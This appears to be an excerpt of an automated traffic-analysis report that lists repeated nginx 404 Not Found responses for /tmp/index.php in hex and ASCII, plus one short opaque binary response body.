      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
